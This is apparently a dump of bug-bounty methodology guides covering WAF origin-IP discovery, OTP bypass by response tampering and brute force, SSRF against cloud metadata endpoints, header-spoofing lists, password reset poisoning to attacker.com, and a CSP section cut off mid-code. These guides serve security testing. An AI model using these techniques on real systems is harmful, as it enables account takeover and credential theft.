[Replace other user files in Inbox messages](https://hackerone.com/reports/322661) 108 | 109 | ### Author 110 | 111 | * [@harsha0x01](https://twitter.com/harsha0x01) 112 | * [@klaus](https://twitter.com/klaus_dev) 113 | -------------------------------------------------------------------------------- /FindOriginIP/FindOrigin.md: -------------------------------------------------------------------------------- 1 | # Finding Origin IPs 
Behind WAFs 2 | 3 | ## Introduction 4 | 5 | Web Application Firewalls (WAFs) like Cloudflare, AWS WAF, and others protect web applications by filtering and monitoring HTTP traffic. However, discovering the origin IP address behind these protective layers can be crucial during security assessments. This guide outlines various techniques to identify origin IPs. 6 | 7 | ## Identifying the Presence of a WAF 8 | 9 | Before attempting to bypass a WAF, first confirm its presence: 10 | 11 | ```bash 12 | # Get the IP address 13 | dig +short example.com 14 | 15 | # Check the organization 16 | curl -s https://ipinfo.io/IP | jq -r '.org' 17 | ``` 18 | 19 | **Common WAF Indicators:** 20 | - AWS WAF: Look for "AWSLB" and "AWSLBCORS" cookies 21 | - Cloudflare: Organization info will indicate Cloudflare, Inc. 22 | - Other WAFs may have specific signatures or response headers 23 | 24 | ## Techniques for Origin IP Discovery 25 | 26 | ### 1. Historical DNS Records 27 | 28 | Historical DNS records often reveal IPs used before WAF implementation: 29 | 30 | - **SecurityTrails DNS History** 31 | - Visit: https://securitytrails.com/domain/example.com/dns 32 | - Export historical A records 33 | - Extract IPs: 34 | ```bash 35 | grep -E -o "([0-9]{1,3}[\\.]){3}[0-9]{1,3}" dns_history.txt | sort -u > potential_ips.txt 36 | ``` 37 | 38 | - **DNS Dumpster** 39 | - Use https://dnsdumpster.com to generate network maps 40 | - Look for non-WAF IP addresses in the results 41 | 42 | ### 2. Subdomain Enumeration 43 | 44 | Development or staging environments often lack proper WAF protection: 45 | 46 | ```bash 47 | # Find subdomains and their IPs 48 | subfinder -silent -d example.com | dnsprobe -silent | awk '{ print $2 }' | sort -u > subdomain_ips.txt 49 | ``` 50 | 51 | Focus on subdomains like: 52 | - dev.example.com 53 | - staging.example.com 54 | - test.example.com 55 | - beta.example.com 56 | 57 | ### 3. 
SSL Certificate Information 58 | 59 | Certificates often reveal all domains and IPs where they're deployed: 60 | 61 | - **Censys Method**: 62 | 1. Search for certificates using your target domain 63 | 2. Select "Certificates" in the input field and search for your domain 64 | 3. Review each certificate and click "Explore" > "IPv4 Hosts" 65 | 4. Collect all associated IPs 66 | 67 | - **Shodan Method**: 68 | ``` 69 | # Search by Common Name (CN) 70 | ssl.cert.subject.CN:"example.com" 71 | 72 | # Search in all certificate fields (broader) 73 | ssl:"example.com" 74 | ``` 75 | 76 | **Note:** Verify results manually as they may include CDN/proxy IPs. SAN (Subject Alternative Name) fields are generally more reliable than CN. 77 | 78 | ### 4. Direct IP Testing 79 | 80 | For each potential IP, test if it responds to the target hostname: 81 | 82 | ```bash 83 | # Test single IP 84 | curl -s -k -H "Host: example.com" https://POTENTIAL_IP/ 85 | 86 | # Test multiple IPs 87 | for ip in $(cat potential_ips.txt); do 88 | org=$(curl -s https://ipinfo.io/$ip | jq -r '.org') 89 | title=$(timeout 2 curl -s -k -H "Host: example.com" https://$ip/ | pup 'title text{}') 90 | echo "IP: $ip | Title: $title | Org: $org" 91 | done 92 | ``` 93 | 94 | ### 5. Email Headers Analysis 95 | 96 | Emails from the target domain often contain internal IP information: 97 | 98 | 1. Trigger emails from the target (register, password reset, newsletters) 99 | 2. Examine email headers, particularly: 100 | - Return-Path 101 | - Received 102 | - X-Originating-IP 103 | 104 | ### 6. 
Specialized Tools 105 | 106 | Several tools automate origin IP discovery: 107 | 108 | - **CloudFail**: 109 | ```bash 110 | git clone https://github.com/m0rtem/CloudFail.git 111 | cd CloudFail 112 | pip install -r requirements.txt 113 | python3 cloudfail.py -t example.com 114 | ``` 115 | 116 | - **CloudFlair**: 117 | ```bash 118 | git clone https://github.com/christophetd/CloudFlair 119 | cd CloudFlair 120 | pip install -r requirements.txt 121 | python3 cloudflair.py example.com 122 | ``` 123 | 124 | ## Verifying the Origin IP 125 | 126 | After discovering potential origin IPs, verify them: 127 | 128 | 1. Compare response content with the WAF-protected site 129 | 2. Look for server fingerprints (headers, error pages) 130 | 3. Check for administrative interfaces or panels not accessible via WAF 131 | 132 | ## Best Practices 133 | 134 | - Combine multiple techniques for better results 135 | - Document all discovered IPs and their verification status 136 | - Check IP ranges belonging to the organization 137 | - Consider timing your requests to avoid rate limiting 138 | 139 | ## References 140 | 141 | - [Navisec: A Pentester's Guide - Unmasking WAFs and Finding the Source](https://delta.navisec.io/a-pentesters-guide-part-5-unmasking-wafs-and-finding-the-source/) 142 | - [Detectify: Bypassing Cloudflare WAF with the Origin Server IP Address](https://blog.detectify.com/2019/07/31/bypassing-cloudflare-waf-with-the-origin-server-ip-address/) 143 | 144 | ## Credits 145 | 146 | ### Original Author 147 | * [maverickNerd](https://x.com/maverickNerd) 148 | 149 | ### Contributors 150 | * [nagarajcruze](https://github.com/nagarajcruze) 151 | * [www](https://github.com/www) 152 | 153 | --- 154 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)* 155 | -------------------------------------------------------------------------------- /Authentication_Bypass/OTP_Bypass.md: 
-------------------------------------------------------------------------------- 1 | # **OTP Bypass Techniques in Account Registration and Authentication** 2 | 3 | ## **Introduction** 4 | One-Time Passwords (OTP) are commonly used for authentication and verification in account registration, login, and critical actions. However, poor OTP implementations can lead to **authentication bypass, account takeover, and unauthorized access**. 5 | 6 | This document outlines **various OTP bypass techniques**, including **response manipulation, rate limit exploitation, default OTP usage, and session validation flaws**. 7 | 8 | --- 9 | 10 | ## **OTP Bypass via Response Manipulation** 11 | ### **Method 1: Manipulating OTP Verification Response** 12 | #### **Steps:** 13 | 1. Register an account with a mobile number and request an OTP. 14 | 2. Enter an **incorrect OTP** and capture the request using **Burp Suite**. 15 | 3. Intercept and **modify the server's response**: 16 | - Original response: 17 | ```json 18 | {"verificationStatus":false,"mobile":9072346577,"profileId":"84673832"} 19 | ``` 20 | - Change to: 21 | ```json 22 | {"verificationStatus":true,"mobile":9072346577,"profileId":"84673832"} 23 | ``` 24 | 4. Forward the manipulated response. 25 | 5. The system authenticates the account despite the incorrect OTP. 26 | 27 | **Impact:** 28 | - **Full account takeover** without providing a valid OTP. 29 | 30 | --- 31 | 32 | ### **Method 2: Changing Error Response to Success** 33 | #### **Steps:** 34 | 1. Go to the **login page** and enter your phone number. 35 | 2. When prompted for an OTP, enter an **incorrect OTP**. 36 | 3. Capture the **server response**: 37 | ```json 38 | { "error": "Invalid OTP" } 39 | ``` 40 | 4. Modify it to: 41 | ```json 42 | { "success": "true" } 43 | ``` 44 | 5. Forward the response. 45 | 6. If the server accepts this modification, you gain access without entering a valid OTP. 
46 | 47 | **Impact:** 48 | - **Authentication bypass leading to account takeover**. 49 | 50 | --- 51 | 52 | ### **Method 3: OTP Verification Across Multiple Accounts** 53 | #### **Steps:** 54 | 1. Register **two different accounts** with separate phone numbers. 55 | 2. **Enter the correct OTP** for one account and intercept the request. 56 | 3. Capture the server response and note **status:1** (success). 57 | 4. Now, attempt to verify the second account with an **incorrect OTP**. 58 | 5. Intercept the server response where the status is **status:0** (failure). 59 | 6. Change **status:0** to **status:1** and forward the response. 60 | 7. If successful, you bypass OTP authentication. 61 | 62 | **Impact:** 63 | - **Bypassing OTP verification for multiple accounts**. 64 | 65 | --- 66 | 67 | ## **OTP Bypass Using Form Resubmission in Repeater** 68 | #### **Steps:** 69 | 1. Register an account using a **non-existent phone number**. 70 | 2. Intercept the OTP request in **Burp Suite**. 71 | 3. Send the request to **Repeater** and forward it. 72 | 4. Modify the phone number in the request to **your real number**. 73 | 5. If the system **sends the OTP to your real number**, use it to register under the **fake number**. 74 | 75 | **Impact:** 76 | - **Unauthorized account registration using someone else's OTP**. 77 | 78 | --- 79 | 80 | ## **Bypassing OTP with No Rate Limiting** 81 | ### **Steps:** 82 | 1. **Create an account** and request an OTP. 83 | 2. Enter an **incorrect OTP** and capture the request in Burp Suite. 84 | 3. Send the request to **Burp Intruder** and **set a payload on the OTP field**. 85 | 4. Set **payload type as numbers** (`000000` to `999999`). 86 | 5. Start the attack. 87 | 6. If **no rate limit** is enforced, the correct OTP will eventually match. 88 | 89 | **Impact:** 90 | - **Complete OTP bypass through brute force**. 91 | 92 | --- 93 | 94 | ## **Additional OTP Bypass Test Cases** 95 | ### **1. 
Default OTP Values** 96 | - Some applications use default OTP values such as: 97 | ``` 98 | 111111, 123456, 000000 99 | ``` 100 | - Test common default values to check for misconfigurations. 101 | 102 | ### **2. OTP Leakage in Server Response** 103 | - Some applications leak OTPs in API responses. 104 | - **Intercept OTP request responses** and check if OTP is present. 105 | 106 | ### **3. Checking if Old OTP is Still Valid** 107 | - Some systems allow the **reuse of old OTPs**. 108 | - Test if **previously used OTPs** are still accepted. 109 | 110 | --- 111 | 112 | ## **Rate Limiting Attack on OTP Verification** 113 | ### **Steps:** 114 | 1. **Navigate to the OTP verification endpoint**: 115 | ``` 116 | https://abc.target.com/verify/phoneno 117 | ``` 118 | 2. Enter an **invalid OTP** (e.g., `000000`). 119 | 3. **Intercept the request** and send it to **Intruder**. 120 | 4. Set the **OTP field as the payload position**. 121 | 5. Use **payload type: numbers** and define a **range (000000 - 999999)**. 122 | 6. Start the attack. 123 | 7. Identify a **response length change**, which may indicate the correct OTP. 124 | 125 | **Impact:** 126 | - **Brute-force attack leading to OTP bypass and account takeover**. 
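Every technique above relies on a server-side defect: the verdict is read back from the response, the code is guessable or reusable, or attempts are unlimited. As an added example (not from the original notes), here is an OTP store written for this page that closes those gaps; the parameters (6 digits, 5 attempts, 300-second lifetime) and account names are illustrative.

```python
"""Added example (not part of the original OTP notes): a server-side OTP store
that keeps the verdict server-side, uses random single-use codes with an expiry,
compares in constant time and caps attempts per code. Limits are illustrative."""
import hmac
import secrets
import time
from dataclasses import dataclass, field
from typing import Callable, Dict

OTP_DIGITS = 6
MAX_ATTEMPTS = 5
TTL_SECONDS = 300


@dataclass
class OtpRecord:
    code: str
    issued_at: float
    attempts: int = 0
    used: bool = False


@dataclass
class OtpStore:
    clock: Callable[[], float] = time.time          # injectable so expiry can be tested
    records: Dict[str, OtpRecord] = field(default_factory=dict)
    verified: Dict[str, bool] = field(default_factory=dict)

    def issue(self, account: str) -> str:
        """Random code; reissuing replaces (and so invalidates) any earlier code."""
        code = f"{secrets.randbelow(10 ** OTP_DIGITS):0{OTP_DIGITS}d}"
        self.records[account] = OtpRecord(code=code, issued_at=self.clock())
        self.verified[account] = False
        return code   # goes to the SMS/email channel only, never into an HTTP response

    def verify(self, account: str, submitted: str) -> str:
        """Returns a status string; the client never gets to supply the verdict."""
        rec = self.records.get(account)
        if rec is None:
            return "no_pending_otp"
        if rec.used:
            return "already_used"               # old codes are dead after one success
        if self.clock() - rec.issued_at > TTL_SECONDS:
            del self.records[account]
            return "expired"
        if rec.attempts >= MAX_ATTEMPTS:
            del self.records[account]           # burn the code: a brute force must restart
            return "locked"
        rec.attempts += 1
        if not hmac.compare_digest(rec.code, submitted):
            return "invalid"
        rec.used = True
        self.verified[account] = True           # the only place the flag is ever set
        return "ok"

    def is_verified(self, account: str) -> bool:
        return self.verified.get(account, False)


if __name__ == "__main__":
    store = OtpStore()
    code = store.issue("alice")
    print(store.verify("alice", "000000"), store.verify("alice", code), store.verify("alice", code))
```

With this in place, flipping `verificationStatus` in the response changes nothing because the next request re-reads `is_verified()` server-side; the 10^6 keyspace is unreachable at 5 attempts per code; and a leaked or old code is rejected once used or expired. Pair it with a per-account and per-IP limit on `issue()` so the send endpoint cannot be abused for SMS flooding.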

---

## **Contributors**
- **[@akshaykerkar13](https://twitter.com/akshaykerkar13)**
- **[@Yn0tWhy](https://twitter.com/Yn0tWhy)**
- **[@Virdoex_hunter](https://twitter.com/Virdoex_hunter)**
- **[@febinrev](https://twitter.com/febinrev)**
- **[@fani_malik](https://twitter.com/fanimalikhack)**
- **[@v3daxt](https://twitter.com/v3daxt)**
- **[@prakhar0x01](https://twitter.com/prakhar0x01)**

---
*Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
-------------------------------------------------------------------------------- /SSRF/SSRF-old.md: --------------------------------------------------------------------------------
# SSRF (Server-Side Request Forgery)
* What's SSRF?
* SSRF is a class of vulnerability where an attacker abuses server-side functionality that fetches a URL, making the server issue requests to destinations of the attacker's choosing: internal services, cloud metadata endpoints and other hosts the attacker cannot reach directly.

## Where to look for?

1. If you have an open redirect, try escalating it to SSRF: a server-side fetcher that follows redirects will follow yours to an internal address.

2. Use `gf ssrf` to grep collected URLs for parameters that are likely to be fetched server-side.

3. SSRFs are more common in APIs, so crawl the whole web app with the Burp proxy on and search for keywords like:
```
?url=
?uri=
?req=
etc.
```
4. Sign up with an email address such as `anything@<your-id>.oastify.com` (Burp Collaborator) or an interactsh domain. If you receive an **HTTP** request in Collaborator, the server fetched something from the address you supplied and you have a blind SSRF to dig into. DNS-only or SMTP-only callbacks are expected behaviour for an email address (MX lookup, mail delivery) and are not SSRF; don't report them.

## AWS Metadata
Most sites run on AWS nowadays...

* The EC2 instance metadata service (IMDS) lives at the link-local address 169.254.169.254. It is not localhost, so 127.0.0.1 is the wrong target for it.

* If you found an SSRF in something running on EC2, try requesting:
```
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_ROLE_NAME_HERE
```
* The `security-credentials/` listing returns the attached role name; requesting that name returns temporary `AccessKeyId`, `SecretAccessKey` and `Token` values for it.
* Caveat: if the instance enforces IMDSv2, every read needs a session token obtained with a `PUT /latest/api/token` request carrying the `X-aws-ec2-metadata-token-ttl-seconds` header, so a GET-only SSRF (the common case) gets a 401. GCP (`http://metadata.google.internal/computeMetadata/v1/`, requires `Metadata-Flavor: Google`) and Azure (`http://169.254.169.254/metadata/instance?api-version=2021-02-01`, requires `Metadata: true`) likewise need a custom header, so check whether your SSRF lets you set headers before concluding the metadata service is unreachable.
* Source: https://twitter.com/ADITYASHENDE17/status/1305051512335298562

## Escalation

* SSRF can be escalated to RCE, for example through an internal admin interface or a Redis/memcached instance reachable only from the server :) [Impact High]
* Use an out-of-band domain (Burp Collaborator, interactsh) to confirm blind SSRF and to see which protocols the server will speak (thehackerish has a good video on it :)
* If the only effect of your SSRF is a redirect rather than an internal fetch, try escalating it to XSS or open-redirect impact instead.

## Resources 💯
### Youtube
* https://www.youtube.com/watch?v=U0bPPw6uPgY&t=1s
* https://www.youtube.com/watch?v=324cZic6asE
* https://www.youtube.com/watch?v=o-tL9ULF0KI
* https://www.youtube.com/watch?v=324cZic6asE&t=751s
* https://youtu.be/m4BxIf9PUx0
* https://youtu.be/apzJiaQ6a3k
* [A New Era of SSRF](https://www.youtube.com/watch?v=R9pJ2YCXoJQ) by [Orange Tsai](https://blog.orange.tw/)

### Hackerone Reports
* https://hackerone.com/hacktivity?order_field=popular&filter=type%3Apublic&querystring=SSRF
* https://hackerone.com/reports/737161
* https://hackerone.com/reports/816848
* https://hackerone.com/reports/398799
* https://hackerone.com/reports/382048
* https://hackerone.com/reports/406387
* https://hackerone.com/reports/736867
* https://hackerone.com/reports/517461
* https://hackerone.com/reports/508459
* https://hackerone.com/reports/738553
* https://hackerone.com/reports/514224
* https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
* https://hackerone.com/reports/341876
* https://hackerone.com/reports/793704
* https://hackerone.com/reports/386292
* https://hackerone.com/reports/326040
* https://hackerone.com/reports/310036
* 
https://hackerone.com/reports/643622 69 | * https://hackerone.com/reports/885975 70 | * https://hackerone.com/reports/207477 71 | * https://hackerone.com/reports/514224 72 | 73 | ### Blogs 74 | * https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 75 | * https://medium.com/@kapilvermarbl/ssrf-server-side-request-forgery-5131ffd61c3c 76 | * https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326 77 | * https://medium.com/@chawdamrunal/what-is-server-side-request-forgery-ssrf-7cd0ead0d95f 78 | * https://medium.com/swlh/ssrf-in-the-wild-e2c598900434 79 | * https://medium.com/@briskinfosec/ssrf-server-side-request-forgery-ae44ec737cb8 80 | * https://medium.com/@GAYA3_R/vulnerability-server-side-request-forgery-ssrf-9fe5428184c1 81 | * https://medium.com/@gupta.bless/exploiting-ssrf-for-admin-access-31c30457cc44 82 | * https://medium.com/bugbountywriteup/server-side-request-forgery-ssrf-f62235a2c151 83 | * https://medium.com/@dlpadmavathi.us/ssrf-attack-real-example-a7279256abee 84 | * https://blog.securityinnovation.com/the-many-faces-of-ssrf 85 | * https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/ 86 | * http://www.techpna.com/uptzh/blind-ssrf-medium.html 87 | * https://blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5ec5d90 88 | * http://institutopaideia.com.br/journal/blind-ssrf-medium-cfa769 89 | * https://www.reddit.com/r/bugbounty/comments/cux2zs/ssrf_in_the_wild_the_startup_medium/ 90 | * https://www.sonrn.com.br/blog/5a44cc-blind-ssrf-medium 91 | * https://ssrf-bypass-medium.thickkare.pw/ 92 | * https://hackerone.com/reports/326040 93 | * https://www.zerocopter.com/vulnerabilities-price-list-printable 94 | * https://medium.com/swlh/intro-to-ssrf-beb35857771f 95 | * https://medium.com/poka-techblog/server-side-request-forgery-ssrf-attacks-part-1-the-basics-a42ba5cc244a 96 | * 
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-3-b0f5997e3739 97 | * https://medium.com/bugbountywriteup/server-side-request-forgery-ssrf-testing-b9dfe57cca35 98 | * https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0 99 | * https://medium.com/bugbountywriteup/tagged/ssrf 100 | * https://medium.com/seconset/all-about-ssrf-524f41ab96df 101 | * https://blog.cobalt.io/from-ssrf-to-port-scanner-3e8ef5921fbf 102 | * https://portswigger.net/web-security/ssrf 103 | * https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery 104 | 105 | ### Github Repos 106 | * https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery 107 | * https://github.com/jdonsec/AllThingsSSRF 108 | 109 | ### Author: 110 | * [@0xCyberPirate](https://twitter.com/0xCyberPirate) 111 | * [0xrtt](https://twitter.com/0xrtt) 112 | -------------------------------------------------------------------------------- /WAF_Bypasses/WAF_Bypass_Using_headers.md: -------------------------------------------------------------------------------- 1 | # **WAF Bypass Using Headers (Password Reset Poisoning)** 2 | 3 | ## **Introduction** 4 | Web Application Firewalls (WAFs) are commonly used to filter and monitor HTTP traffic to protect web applications from attacks. However, attackers can bypass WAFs by **manipulating HTTP headers**. One such attack involves **Password Reset Poisoning**, where an attacker leverages forged headers to manipulate the behavior of the application, particularly in password reset functionalities. 5 | 6 | This document outlines techniques to **bypass WAFs** using custom headers, including examples of how they can be used in **password reset poisoning** and other similar attacks. 
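The mechanism behind the rest of this document, in code. This is an added example for this page, not code from the HowToHunt repository or from any real application: a reset-link builder that honours the override headers (the bug), the hardened version that takes the host from configuration (the fix), and the two checks a tester runs, generating one request per header and inspecting the link that arrives in the email. `CANONICAL_HOST`, `ALLOWED_HOSTS` and the `HOST_OVERRIDE_HEADERS` subset are assumptions; `victim-site.com` and `attacker.com` are the page's own placeholders.

```python
"""Password reset poisoning through forwarding headers: vulnerable and hardened
link construction, plus the tester-side checks.

Added example for this page, not code from the HowToHunt repository or from any
real application. Everything is a self-contained model: requests are plain dicts
of headers, CANONICAL_HOST/ALLOWED_HOSTS are assumed deployment settings, and
victim-site.com / attacker.com are the page's own placeholders.
"""
from urllib.parse import urlsplit

# Headers that proxies and web frameworks commonly consult when rebuilding the
# request's public hostname. Any client can send them. (Assumed subset of the
# page's list; extend it with the others.)
HOST_OVERRIDE_HEADERS = (
    "X-Forwarded-Host",
    "X-Forwarded-Server",
    "X-Host",
    "X-Http-Host-Override",
    "Proxy-Host",
)

CANONICAL_HOST = "victim-site.com"                          # assumed config value
ALLOWED_HOSTS = {"victim-site.com", "www.victim-site.com"}  # assumed allowlist


def _lower(headers: dict) -> dict:
    """Case-insensitive view of a header dict (HTTP header names are case-insensitive)."""
    return {k.lower(): v for k, v in headers.items()}


def vulnerable_reset_link(headers: dict, token: str) -> str:
    """The bug: prefer X-Forwarded-Host & co. over Host, then trust Host blindly.
    Proxy-aware frameworks do exactly this when 'trusted proxies' is left open."""
    h = _lower(headers)
    for name in HOST_OVERRIDE_HEADERS:
        if name.lower() in h:
            host = h[name.lower()].split(",")[0].strip()   # first hop wins
            break
    else:
        host = h.get("host", CANONICAL_HOST)
    scheme = h.get("x-forwarded-scheme", h.get("x-forwarded-proto", "https"))
    return f"{scheme}://{host}/reset?token={token}"


def hardened_reset_link(headers: dict, token: str) -> str:
    """The fix: the link host comes from configuration, never from override headers.
    If Host must be honoured (multi-tenant), accept it only from an allowlist."""
    h = _lower(headers)
    host = h.get("host", "")
    if host not in ALLOWED_HOSTS:
        host = CANONICAL_HOST
    return f"https://{host}/reset?token={token}"


def link_is_poisoned(link: str) -> bool:
    """Tester-side check on the link pulled from the reset email: does it point
    anywhere other than the site's own hosts?"""
    return urlsplit(link).hostname not in ALLOWED_HOSTS


def poisoning_variants(target_host: str, canary: str) -> list:
    """Requests to replay one at a time (Burp Repeater/Intruder): the bare Host
    swap first, then each override header on its own so you know which one hit.
    Returns (headers, description) pairs."""
    variants = [({"Host": canary}, "Host header replaced")]
    for name in HOST_OVERRIDE_HEADERS:
        variants.append(({"Host": target_host, name: canary}, f"{name} injected"))
    return variants


if __name__ == "__main__":
    attack = {"Host": "victim-site.com", "X-Forwarded-Host": "attacker.com"}
    for build in (vulnerable_reset_link, hardened_reset_link):
        link = build(attack, "abcdef123456")
        print(f"{build.__name__:24} {link}  poisoned={link_is_poisoned(link)}")
```

Send one variant per request: if several override headers go out together and the link changes, you cannot tell the program which header the application trusts, and the fix recommendation (ignore that header at the proxy, or pin the host in configuration) depends on it.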

---

## **How Does WAF Header Manipulation Work?**
Many web applications rely on **HTTP headers** to determine a user's origin, client IP, session or intended destination. By modifying these headers, an attacker can:
- Trick the application into believing the request comes from a trusted source (a loopback or internal IP, for example).
- Redirect password reset links to an attacker's domain.
- Bypass checks built on `X-Forwarded-For`, `Referer` or `Origin`.
- Spoof a legitimate user where headers feed authentication decisions.

Some deployments also have misconfigured **reverse proxies** that accept client-IP headers from any source instead of only from the proxy in front of them, so a forged header unlocks **internal-only** functionality.

Check first whether the application reflects or acts on a header at all: inject a unique value (a Collaborator hostname or a random string) and look for it in responses, emails and redirect targets.

---

## **Common Headers Used for WAF Bypass**
Below are the headers most often consulted for the client's address or for the request's public hostname. The values shown are the usual starting point; also try each header with an empty value, and for the host-type headers try both an attacker-controlled hostname (poisoning) and `127.0.0.1` (internal access).

Client-IP headers:

```
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
X-Real-Ip: 127.0.0.1
Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
```

Host, URL and origin headers:

```
X-Forwarded-Host: attacker.com
X-Forwarded-Port: 443
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
Proxy-Host: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Proxy-Url: 127.0.0.1
Proxy-Url: 127.0.0.1
Base-Url: 127.0.0.1
Http-Url: 127.0.0.1
Url: 127.0.0.1
Uri: 127.0.0.1
Request-Uri: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Origin: null
Origin: [siteDomain].attacker.com
```

---

## **Practical Attack Scenario: Password Reset Poisoning**
### **Step 1: Identifying the Vulnerability**
- Many web applications build the password reset link from the request's **Host** header, or from `X-Forwarded-Host` when they sit behind a proxy, instead of from a configured canonical hostname.
- If those headers are **not validated**, an attacker can **poison** the reset URL that is emailed to the victim.

### **Step 2: Sending a Manipulated Request**
Request a reset for the victim's address while overriding the host. Try the `Host` header alone first, then the override headers one at a time, so that you know which header the application trusts.

**Example Request:**
```http
POST /reset-password HTTP/1.1
Host: victim-site.com
X-Forwarded-Host: attacker.com
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
Content-Type: application/x-www-form-urlencoded

email=victim@victim.com
```

### **Step 3: Intercepting the Response**
If the server uses `X-Forwarded-Host` without validating it, the email it sends **to the victim** contains a link such as:

```
https://attacker.com/reset?token=abcdef123456
```

When the victim clicks it, the reset token lands in the attacker's web server log. The attacker then opens `https://victim-site.com/reset?token=abcdef123456` and sets a new password, taking over the account. No phishing page is required, although one can be served at the same path so the victim notices nothing. While testing, point the header at a host you control and confirm that the token for your own test account arrives there before you report.

---

## **Other Uses of WAF Header Manipulation**
### **1. Bypassing IP-Based Restrictions**
- Some applications, WAFs or reverse proxies **allow or block** access based on the client's IP address.
- If the check reads the address from a header such as `X-Forwarded-For` rather than from the TCP connection, an attacker can **spoof the IP** and gain access. `127.0.0.1` is the first value to try; private ranges (`10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`) come next.

**Example Request:**
```http
GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 192.168.1.100
```
- If `192.168.1.100` is treated as a **trusted internal IP**, the 403 becomes a 200.

---

### **2. Exploiting Open Redirects**
Some applications use `Referer`, `Redirect` or `X-Forwarded-Host` when constructing redirect URLs.

**Example Request:**
```http
GET /login?redirect=https://victim.com HTTP/1.1
Host: target.com
X-Forwarded-Host: attacker.com
```
- If the application builds an absolute redirect from `X-Forwarded-Host`, the user lands on a phishing page **hosted by the attacker**.

---

### **3. SSRF (Server-Side Request Forgery) Exploitation**
Some applications build an outbound request from the request's own host or URL headers (to fetch a preview, call back to "itself", or reach an internal API). By modifying those headers, an attacker can:
- Force the application to fetch **internal resources**.
- Target **AWS metadata services** (`169.254.169.254`) or other sensitive internal services.

**Example Request:**
```http
GET /api/v1/fetch HTTP/1.1
Host: target.com
X-Forwarded-For: 169.254.169.254
X-Real-IP: 169.254.169.254
```
- This only works when the application actually uses one of the headers to build the outbound URL; the host-type headers (`X-Forwarded-Host`, `X-Original-Url`) are the likelier candidates, client-IP headers rarely are. When it does work, it can **leak AWS credentials** or **internal system information**. Note that IMDSv2 requires a token obtained with a `PUT`, so GET-only fetches return 401 on instances that enforce it.

---

## **Author**
- **[Virdoex_hunter](https://twitter.com/Virdoex_hunter)**
- **[remonsec](https://x.com/remonsec)**

---
*Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
--------------------------------------------------------------------------------
/XSS/Bypass_CSP.md:
--------------------------------------------------------------------------------
# Content Security Policy (CSP)

## What is CSP?

Content Security Policy (CSP) is a browser security mechanism that defines which resources a page may load or execute: which scripts, images, frames and other content, and from which origins. CSP is delivered either as an HTTP response header (`Content-Security-Policy`) or as a `<meta http-equiv>` element within the HTML page.
Once implemented, the browser enforces the policy, blocks every violation it detects and, if `report-uri` or `report-to` is set, reports it.

---

## How Does CSP Work?

CSP restricts the sources from which active content (scripts, frames, plugins) and passive content (images, fonts, media) can be loaded. It can also forbid inline JavaScript, disable `eval()` and the other string-to-code functions, and limit each resource type to specific origins.

---

## Defining CSP Rules

The following example illustrates a CSP configuration:

```plaintext
default-src 'none';
img-src 'self';
script-src 'self' https://code.jquery.com;
style-src 'self';
report-uri /__cspreport__;
font-src 'self' https://addons.cdn.mozilla.net;
frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';
```

---

## Key CSP Directives

Below are some important CSP directives and their functions:

1. **script-src:** Defines allowed sources for JavaScript, covering inline scripts as well as external script files.
2. **default-src:** Sets the fallback policy for every fetch directive that is not explicitly defined.
3. **child-src:** Controls allowed sources for web workers and embedded frames.
4. **connect-src:** Restricts the URLs reachable through `fetch`, `WebSocket`, `XMLHttpRequest` and similar interfaces.
5. **frame-src:** Defines allowed sources for `<iframe>` and `<frame>` elements.

---

### 2. JSONP-Based CSP Bypass

JSONP (JSON with Padding) is a legacy cross-origin data technique: the endpoint wraps its response in a JavaScript function whose name the caller supplies in a `callback` parameter, and the page loads it with a `<script>` tag. If the endpoint does not sanitise the callback name, the response body is attacker-chosen JavaScript served from the endpoint's origin. Any such endpoint on a host listed in `script-src` therefore turns a whitelisted origin into an arbitrary-script source.
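An added example, not code from the page, the repository or any CSP library: a small auditor that parses a `Content-Security-Policy` value the way a browser does (first occurrence of a directive wins, fetch directives fall back to `default-src`) and flags the weaknesses this section covers, including a whitelisted JSONP host and the reflected-input case of CSP injection. `JSONP_HOSTS` is an assumption seeded with the page's `accounts.google.com` example; the policies in the tests are the page's own example plus constructed weak variants.

```python
"""Audit a Content-Security-Policy value for the weaknesses this page discusses.

Added example for this page; not code from the page, the repository or any CSP
library. JSONP_HOSTS is an assumption (the page names accounts.google.com);
maintain your own list from real findings.
"""
from typing import Dict, List

JSONP_HOSTS = {"accounts.google.com"}   # assumed list of hosts with ?callback= endpoints


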